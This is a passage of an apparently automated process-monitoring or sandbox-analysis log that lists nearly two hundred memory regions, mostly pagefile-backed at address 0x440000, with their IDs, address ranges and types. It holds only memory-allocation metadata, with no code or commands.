Region: id = 1820 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1821 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1822 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1823 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1824 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1825 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1826 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1827 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1828 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1829 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1830 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1831 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1832 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1833 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1834 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1835 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1836 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1837 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1838 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1839 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1840 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1841 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1842 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1843 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1844 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1845 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1846 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1847 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1848 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1849 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1850 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1851 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1852 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1853 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1854 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1855 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1856 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1857 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1858 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1859 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1860 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1861 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1862 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1863 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1864 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1865 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1866 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1867 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1868 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1869 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1870 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1871 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1872 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1873 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1874 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1875 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1876 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1877 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1878 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1879 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1880 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1881 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1882 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1883 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1884 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1885 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1886 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1887 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1888 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1889 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1890 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1891 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1892 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1893 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1894 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1895 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1896 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1897 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1898 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1899 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1900 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1901 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1902 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1903 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1904 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1905 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1906 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1907 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1908 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1909 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1910 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1911 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1912 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1913 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1914 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1915 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1916 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1917 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1918 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1919 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1920 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1921 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1922 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1923 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1924 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1925 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1926 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1927 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1928 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1929 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1930 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1931 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1932 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1933 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1934 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1935 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1936 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1937 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1938 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1939 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1940 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1941 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1942 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1943 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1944 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1945 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1946 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1947 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1948 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1949 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1950 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1951 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1952 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1953 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1954 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1955 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1956 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1957 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1958 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1959 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1960 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1961 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1962 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1963 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1964 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1965 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1966 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1967 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1968 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1969 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1970 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1971 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1972 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1973 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1974 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1975 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1976 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1977 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1978 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1979 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1980 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1981 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1982 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1983 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1984 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1985 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1986 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1987 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1988 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1989 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1990 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1991 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1992 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1993 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1994 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1995 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1996 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1997 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1998 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1999 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2000 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2001 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2002 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2003 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2004 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2005 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2006 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2007 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2008 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2009 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 